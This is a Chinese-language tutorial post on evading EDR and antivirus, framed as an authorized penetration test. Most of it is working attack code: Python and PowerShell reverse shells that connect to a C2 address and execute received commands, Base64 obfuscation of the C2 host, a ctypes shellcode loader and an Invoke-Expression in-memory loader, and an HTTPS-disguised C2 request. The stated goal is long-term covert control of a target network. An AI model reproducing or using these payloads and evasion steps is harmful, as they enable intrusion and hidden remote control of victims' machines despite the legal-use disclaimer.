一、从实战案例谈起:一次完美的EDR绕过
在一次授权的渗透测试任务中,我接到一个挑战——目标企业的安全防护层部署了全套高级EDR(Endpoint Detection and Response)解决方案,且终端设备之间存在严格的组策略限制。这种情况下,传统的恶意载荷很难逃过EDR的动态行为分析。
目标是通过免杀技术,将一个自定义的远控载荷成功植入目标内网,并实现长期隐蔽控制。最终,我通过利用混淆技术、内存加载以及流量伪装,完美绕过了客户的EDR体系,并完成了任务。
这篇文章将以这次实战为蓝本,详细拆解免杀技术的核心思路,并提供实战代码和方法论,使你能够掌握如何在高对抗环境中完成类似任务。当然,这一切仅限于合法授权的渗透测试活动。
---
二、免杀的本质:攻防对抗下的信息战
在渗透攻击中,免杀技术的意义不仅仅是绕过杀毒软件,而是要让恶意代码的行为看起来“无害”。现代安全软件的核心检测机制包括以下几类:
- 静态签名扫描:基于已知恶意文件的特征码匹配。
- 行为分析:检测进程的动态行为,发现类似于恶意软件的模式。
- 沙箱分析:在隔离环境中运行文件,观察其潜在威胁行为。
- 流量检测:分析网络通信特征,识别可疑流量。
因此,免杀的核心思路是同时在静态层面和动态层面重塑恶意代码的行为,使其在目标环境中看起来像普通应用程序。下面,我们将分解免杀技术的完整实现路径。
---
三、武器化载荷:从功能实现到免杀改造
在一个典型的渗透场景中,攻击者的首要任务是生成一个远控载荷,能够建立与攻击者C2服务器的持久连接。在这里,我们通过一个极简的 Python 和 PowerShell 载荷来演示。
原始恶意载荷实现(未免杀)
下面是一个简单的反向Shell示例,用于连接攻击者的C2服务器:
Python版本
<pre><code class="language-python">import socket import subprocess import os
def reverse_shell():
连接攻击者的C2服务器
host = "192.168.1.100" # 替换为你的C2 IP port = 4444 # 替换为你的监听端口
try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) while True:
接收命令
command = s.recv(1024).decode("utf-8") if command.lower() == "exit": break
执行命令并返回结果
result = subprocess.getoutput(command) s.send(result.encode("utf-8")) except Exception as e: print(f"Error: {e}") finally: s.close()
if __name__ == "__main__": reverse_shell()</code></pre>
PowerShell版本
<pre><code class="language-powershell">$client = New-Object System.Net.Sockets.TCPClient("192.168.1.100", 4444) # 替换为你的C2地址 $stream = $client.GetStream() $writer = New-Object System.IO.StreamWriter($stream) $reader = New-Object System.IO.StreamReader($stream)
try { while ($true) {
接收命令
$command = $reader.ReadLine() if ($command -eq "exit") { break }
执行命令并发送结果
$output = Invoke-Expression $command 2>&1 $writer.WriteLine($output) $writer.Flush() } } catch { Write-Host "Error: $_" } finally { $writer.Close() $reader.Close() $stream.Close() $client.Close() }</code></pre>
上面的代码在静态特征和动态行为上都极具攻击性,直接运行几乎会被任何主流EDR瞬间拦截。
---
四、改造第一步:静态免杀
方法1:字符串混淆
字符串是安全检测的重中之重,特别是像 192.168.1.100 和 subprocess.getoutput 这样的关键字,可以通过混淆来绕过。
Python混淆
<pre><code class="language-python">import socket import subprocess import base64
def reverse_shell():
使用Base64编码隐藏IP和端口
host = base64.b64decode("MTkyLjE2OC4xLjEwMA==").decode("utf-8") port = int(base64.b64decode("NDQ0NA==").decode("utf-8"))
try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) while True: command = s.recv(1024).decode("utf-8") if command.lower() == "exit": break result = subprocess.getoutput(command) s.send(result.encode("utf-8")) except Exception as e: pass finally: s.close()
if __name__ == "__main__": reverse_shell()</code></pre>
PowerShell混淆
<pre><code class="language-powershell">$encodedHost = "MTkyLjE2OC4xLjEwMA==" # Base64编码的IP $encodedPort = "NDQ0NA==" # Base64编码的端口 $host = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encodedHost)) $port = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encodedPort))
$client = New-Object System.Net.Sockets.TCPClient($host, [int]$port)</code></pre>
通过Base64对IP和端口进行编码,可以有效地绕过部分静态特征检测。
---
五、改造第二步:动态免杀
方法1:内存加载技术
为了防止文件落地被EDR检测,我们可以将载荷直接加载到内存中执行。
Python内存加载
<pre><code class="language-python">import ctypes import base64
将恶意Shell代码动态加载到内存中执行
shellcode = base64.b64decode("你的Shellcode的Base64编码") shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode)) shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(None)) shellcode_func()</code></pre>
PowerShell内存加载
<pre><code class="language-powershell"># 将脚本加载到内存中执行 $payload = "你的Base64编码的PowerShell代码" $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($payload)) Invoke-Expression $decoded</code></pre>
内存加载技术可以完全避免文件落地,极大地降低被静态检测的风险。
---
六、网络流量的隐匿:把C2伪装成正常服务
在绕过流量检测时,我们需要让C2服务器的通信行为尽可能接近合法流量。以下是几种常见的伪装技术:
- HTTPS伪装:将C2通信封装在HTTPS协议中,利用合法的SSL证书增加可信度。
- DNS隧道:通过域名解析请求进行数据传输,难以被流量过滤器阻止。
- 流量混淆:将C2流量与正常流量混合,例如模拟浏览器访问行为。
HTTPS伪装示例
<pre><code class="language-python">import requests
url = "https://合法域名.com/endpoint" data = {"cmd": "whoami"} # 模拟正常的POST请求 response = requests.post(url, json=data) print(response.text)</code></pre>
---
七、总结:免杀技术的攻防博弈
免杀技术的核心是理解安全防护的检测逻辑,并从攻击者的视角对恶意载荷进行重构。通过代码混淆、内存加载、流量伪装等手段,你可以极大地提高攻击载荷的生存能力。
但需要强调的是,这些技术应仅限于合法授权的安全测试中使用,任何非法用途都将导致严重的法律后果。在攻防对抗的战场上,责任和专业操守同等重要。